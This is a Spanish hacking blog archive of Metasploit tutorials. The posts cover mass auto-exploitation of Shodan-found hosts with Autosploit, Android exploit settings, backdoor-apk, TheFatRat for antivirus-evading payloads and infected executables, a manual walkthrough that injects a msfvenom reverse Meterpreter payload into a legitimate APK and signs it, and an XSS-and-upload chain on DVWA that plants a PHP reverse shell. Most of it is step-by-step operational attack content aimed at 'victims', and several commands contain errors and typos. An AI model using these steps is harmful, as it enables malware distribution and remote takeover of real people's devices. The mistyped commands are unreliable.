Mostrando entradas con la etiqueta metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta metasploit. Mostrar todas las entradas

viernes, 15 de febrero de 2019

Autosploit


Hola amigos.

En esta ocasión, os presento la herramienta Autosploit.

Esta herramienta, nos permitirá, automáticamente, lanzar los exploits hacia un objetivo, sin que nosotros tengamos que hacer casi nada, sólo buscar un objetivo y ponerlo.

Por si fuera poco, esta herramienta nos ayuda a buscar víctimas a través de shodan y censys, por lo que es necesario tener una cuenta de ambas. Y, cuando lo pida, meter los parámetros.

Descargamos la herramienta:




cd AutoSploit

./install.sh





python autosploit.py



Respondemos y

Y metemos los tokens tanto de shodan y de censys.

Si queremos buscar víctimas con shodan, por ejemplo:

search shodan android



Te dará un archivo hosts.txt con los hosts encontrados.

Bien, ahora busquemos

search shodan smb

Busquemos una dirección de hosts.txt y pongamos

exploit IPVICTIMA IP_ATACANTE LPORT

Y automáticamente lanzará exploits



Si queréis poner un proxy (por ejemplo habéis instalado tor https://salamancageek.blogspot.com/2016/03/intalando-tor.html) y os dá problemas, lo que tenéis que hacer es iniciar tor y privoxy e ir a la configuración de red de vuestro KALI LINUX u otra distribución GNU/LINUX y hacer pasar todas las conexiones por el proxy.



viernes, 30 de marzo de 2018

Actualizar metasploit en Kali Linux Moto

Hola amigos.

Si tenéis Kali Linux Moto y queréis actualizar metasploit, es muy fácil, además, vale para 32 bits.

Sólamente hay que abrir una consola y poner, todo seguido, en una misma línea:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&  chmod 755 msfinstall &&  ./msfinstall

Eso sí, ahora, para integrarla con postgresql tenemos que seguir los pasos

service postgresql start

msfdb init

abrimos metasploit:

msfconsole

Y ponemos

db_rebuild_cache

Y yá está todo.

viernes, 27 de octubre de 2017

Postgresql y Metasploit

Hola amigos.

En esta ocasión, vamos a conectar la base de datos postgresql con metasploit, para que nos resulte nuestro pentesting más fácil y rápido.

Kali Linux 2 /Rolling

En primer lugar

service postgresql start

En segundo

msfdb init

Y nos creará el usuario y la contraseña de metasploit automáticamente.

Ejecutamos

msfconsole

Y ya se conectará automáticamente a la base de datos.

Para inicializar la caché, ponemos

db_rebuild_cache

Así, podemos buscar nuestros módulos y exploits más fácilmente.

Kali Linux Moto

En primer lugar, hacemos

service postgresql start

Después

service metasploit start

Iniciamos metasploit

msfconsole

Y ya estará conectada.

Para reconstruir la caché:

db_rebuild_cache

Y así, podremos buscar más rápidamente los módulos y los exploits.

viernes, 15 de septiembre de 2017

Exploits de metasploit para android

Hola amigos:

Hoy vamos a conocer los exploits que trae metasploit (en el momento de escribir estas líneas) para explotar android.

Uno de ellos es stagefright_mp4_tx3g_64_bit:

use exploit/android/browser/stagefright_mp4_tx3g_64_bit

set SRVHOST 192.168.1.131

set URIPATH /

set PAYLOAD linux/armle/mettle/reverse_tcp

set LHOST 192.168.1.131

exploit

Montará un servidor en el puerto indicado (como no lo hemos cambiado, el puerto 8080). Aunque sí es para varios móviles, no es para todos. Cuando la víctima ingresa a esa url maliciosa, explota una vulnerabilidad en la librería stagefright, mediante un archivo mp4.

Otros exploit son:

  • exploit/android/adb_server_exec: Explota un dispositivo android que está escuchando mensajes de depuración adb (adb nos permite interactuar entre un android y un pc).


  • webview_addjavascriptinterface: Para la versión 4.1.2. Un código javascript no confiable puede ejecutar comandos arbitrarios.


  • adobe_reader_pdf_js_interface: Explota una vulnerabilidad de Acrobat Reader en versiones menores a 11.2.0 que crea un pdf infectado.

  • frutex_requeue: Explota una vulnerabilidad en frutex_requeue en el kernel de linux. Todos los núcleos anteriores a Junio del 2014 están expuestos. Es necesaria una sesión previa de meterpreter.

  • put_user_vroot: Permite a un usuarios sin privilegios leer y escribir en la memoria del kernel.




viernes, 23 de diciembre de 2016

Infectar una app fácil

Hola amigos:

Hace unos posts, hablábamos de cómo inyectar un payload de android en una app, y lo hacíamos a mano.

En esta ocasión, vamos a presentar un script que nos lo automatizará. Este script se llama backdoor-apk y lo descargamos de https://github.com/dana-at-cp/backdoor-apk

Lo descomprimimos

unzip backdoor-apk-master.zip

Nos vamos al directorio /backdoor-apk-master/backdoor-apk

Copiamos la app víctima dentro de este mismo directorio.

Y Ejecutamos:

./backdoor-apk.sh <app_victima>

Ojo, es importante poner en el mismo directorio de backdoor-apk.sh la app objetivo, pues si no, nos dará un error.

Y completamos lo que nos piden (tipo de payload, IP local y puerto de destino).





La app infectada la podremos encontrar en el subdirectorio /original/dist/

Podemos iniciar metasploit preparadito para escuchar el payload con

msfconsole -r backdoor-apk.rc






Para borrar los archivos generados y poder volver a usar el script:

./cleanup.sh.

Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
  • Facebook: facebook.com/Manugomez1977
  • Twitter: @manugomez1977
  • Instagram: @MANUGOMEZ1977
Me gustaría agradeceros vuestras visitas, vuestras dudas y vuestro apoyo que he tenido en estos 12 meses de vida del blog. Intentaré seguir posteando y, por supuesto, seguir aprendiendo (que me queda mucho todavía).

Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.

Felices fiestas y ¡¡¡ Happy Hacking !!!


viernes, 14 de octubre de 2016

Tutorial TheFatRat

Hola a todos.

Hoy vamos a presentar un script que va a ayudar a crearnos payloads con msvenom pero, que va a ser indetectable por muchos de los antivirus. Este script recibe el nombre de TheFatRat.

TheFatRat nos permitirá crear payloads tanto para windows como para android, además, lo podemos inyectar a un ejecutable.

En primer lugar, debemos instalar backdoor-factory (si no los tenemos ya instalados).

Apt-get install backdoor-factory

También deberemos instalar mingw32, para ello, si tenemos kali 2016, abrimos /etc/apt/sources.lists y añadimos

deb http://old.kali.org/kali sana main non-free contrib

Guardamos.

Escribimos en la terminal.

apt-get update

y ahora ponemos

apt-get install mingw32

Para los que tengan kali sana, basta con el apt-get install mingw32

El siguiente paso es descargarnos el script desde https://github.com/Screetsec/TheFatRat



descomprimimos donde queramos

unzip TheFatRat-master.zip

Damos permisos de ejecución

chmod +x fatrat

chmod +x powerfull.sh

Ejecutamos

./fatrat



Enter



Las salidas nos las guarda en el directorio output


Además, te crea los archivos para un autorun para usb/dvd, que sólo los tendrías que copiar en el usb/dvd víctima. Estos archivos se crearán en el directorio /autorun

Para cambiar los iconos para el autorun, los deberás copiar en el directorio /icons.

En la opción 1 crearemos un payload encriptado con msfvenom, y en ella tendremos para elegir.



En la opción 2 crearemos un backdoor para la arquitectura x86 de 32 bits para Windows, casi 100% indetectable. Eso sí, tarda mucho en generar el payload. Crea un programa en C con un payload (encriptado shikata ga nai) meterpreter reverse tcp. La salida constará de dos programas, Powerfull.exe y Powerfull-fud.exe.

La opción 3 crea un backdoor indetectable con AVOID v 1.2. Genera un payload con metasploit y nos da a elegir el tipo de binario.



El payload generado se guarda en una carpeta cuyo nombre coincidirá con el nombre que le hayamos puesto al payload. Los ficheros para el autorun estarán guardados en la carpeta autorun.

La opción 4 genera un payload y lo inyecta en otro archivo ejecutable, infectándolo, utilizando para ello backdoor factory. Nos ofrece unos cuantos payloads para inyectar.



Tras buscar los caves disponibles, nos pregunta cuál queremos usar para inyectar.



Los caves son huecos en el programa original en el cual se copiará el payload.

El ejecutable infectado se guardará en la carpeta /backdoored/output.

La opción 5 nos crea distintos listeners




Cada uno de los cuales nos da para elegir el payload que tendríamos que cargar.



Nos abrirá una terminal con el exploit multi handler de metasploit con la configuración con la que hemos configurado el listener.

La opción 6 nos abre metasploit.



La opción 7 usa searchsploit para buscar un exploit cualquiera dentro de nuestro equipo.



La opción 8 nos hace una limpieza de lo que hemos creado, borrando así los payloads.



La opción 9 nos abre la ayuda.



La opción 10 nos pone los créditos.



Happy Hacking.

Recordad que la idea de este blog es aprender, no enseñar a cometer ilegalidades.

Por favor, sígueme, además en las redes sociales:
  • Página de Facebook: Manugomez1977
  • twitter: @manugomez1977
  • instagram: @manugomez1977

Para poder seguir escribiendo posts, por favor, haz click en los anuncios.



viernes, 7 de octubre de 2016

Infectando apk


Hola a todos.

Antes de empezar, quiero, como ya sabréis, que todos estos posts son para fines educativos, y no me hago responsable del uso que hagáis con las informaciones contenidas en este blog.

Esto hay que señalarlo por lo delicada que es la información de este post.

Además, te invito a que me sigas tanto en twitter @manugomez1977, en instagram manugomez1977 y en facebook en la Página Manugomez1977. Así como a que pinches en la publicidad para poder seguir con los posts.

En el día de hoy vamos a ver cómo podremos infectar una app legítima de android con un payload hecho con msfvenom.

Podréis comprobar, según las capturas de pantalla, que me va a durar varios días, porque la cosa es un poquito larga.

En primer lugar, instalaremos la versión apktool de https://ibotpeaches.github.io/Apktool/install , da igual que tengamos la apktool instalada por defecto en nuestro Kali, ya que no va bien. En Kali 1 moto, no haría falta. Sólo hay que tener cuidado que cambian los parámetros.



Debéis seguir los pasos de instalación que tenéis. Lo obviaré porque está bien explicado.

Una vez instalado, estará en /usr/local/bin

Deberéis instalar también Android Studio. Lo podeís descargar de https://developer.android.com/studio/index.html .

Crearemos el payload

msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.134 LPORT=4895 -o meterpreter.apk



meteré meterpreter.apk y la app víctima, en mi caso pokemongo.apk (jajajaja) en la carpteta pokemongo (llamarla como queráis, es indiferente).

Ahora, descompilamos meterpreter.apk y pokemongo.apk

/usr/local/bin/apktool d -f -o payload /root/meterpreter.apk

Meterá los archivos dentro del directorio payload



/usr/local/bin/apktool d -f -o victima /root/meterpreter.apk

Meterá los archivos dentro del directorio victima



Nos vamos a /root/victima/smali/com y creamos el directorio metasploit.

Nos vamos a /root/victima/smali/com/metasploit y creamos el directorio stage.



Copiamos todos los archivos .smali de payload/smali/com/metasploit/stage y los pegamos en victima/smali/com/metasploit/stage



Abrimos el fichero AndroidManifest.xml de la aplicación víctima y buscamos una etiqueta <activity> que contenga las líneas

<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>



En la misma etiqueta <activity>, buscamos android:name= .El valor de atributo estará detrás.

android:name=VALORDELATRIBUTO.

Nos fijaremos que, entre cada parámetro, va a haber dos puntos ':'.

La actividad main de la aplicación víctima será el valor del atributo, cambiando los dos puntos por /.

Por lo tanto, la actividad main, en nuestro caso, será

victima/smali/com/unity3d/player/UnityPlayerNativeActivity.smali



Abrimos ese fichero




Buscamos el método onCreate

;->onCreate(Landroid/os/Bundle;)V




No cerramos el fichero y, en otra terminal, abrimos el fichero

victima/smali/com/metasploit/stage/MainService.smali

Buscamos

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V



Copiamos esta línea y la pegamos justo debajo del método onCreate del fichero victima/smali/com/unity3d/player/UnityPlayerNativeActivity.smali



Guardamos (por supuesto).

Ahora, abrimos, por un lado

/victima/AndroidManifest.xml

y por otro

/payload/AndroidMainfest.xml

En la imagen de la izquierda veremos el AndroidManifest.xml de la aplicación víctima y en la derecha, el del payload



Copiamos los permisos del payload que no estén en los de la app víctima, en el AndroidManifest.xml de esta última. Ten cuidado de no repetirlos y de que no te falte ninguno, pues no funcionará. Hay que tener definidos TODOS los permisos.



Guardamos el último fichero y salimos.

Ahora queda recompilar la aplicación víctima (repito, en mi caso, pokemongo).

/usr/local/bin/apketool b /root/original



El archivo apk de la aplicación infectada se grabará en el directorio

/victima/dist/



Ahora, queda por firmar la app infectada, puesto que android sólo ejecuta apps firmadas.

jarsigner -verbose -keystore /root/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/pokemongo/victima/dist/pokemongo.apk androiddebugkey

Si no funciona, quitar la parte de -sigalg
 
 



Para crear el debug.keystore:

Creamos el directorio /root/.android

keytool -genkey -v -keystore /root/.android/degug.keystore -storepass android -allias androiddebugkey -keypass android -dname “DN=Android Debug,O=Android,C=ES”


Happy hacking




viernes, 30 de septiembre de 2016

Subiendo shell con xss

Hola amigos.

Hoy vamos a jugar un poquito con xss, en esta ocasión, usaremos dvwa, ya que lo estamos haciendo últimamente.

Para trabajar, nos vamos a xss reflejado.



Si le damos a view code, obtendremos el código fuente


<?php if(!array_key_exists ("name"$_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 
$isempty true;

} else {
        
 echo 
'<pre>';
 echo 
'Hello ' $_GET['name'];
 echo 
'</pre>';
    
}
?>



Como vemos, no hay ningún tipo de filtro.

Si insertamos un nombre, nos saluda y todo.



Comprobamos que es vulnerable a la inyección xss.

<script>alert("hola");</script>



Ahora crearemos un payload de php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R > meterpreter.php



Subimos meterpreter.php a la pagina web en el apartado upload






Ahora, abrimos el navegador y ponemos

<script>window.location=”http://192.168.1.134/dvwa/hackable/uploads/meterpreter.php”</script>






Ya estamos dentro.

Por favor, para poder seguir subiendo posts, es necesario que pinches en la publi. Muchas gracias.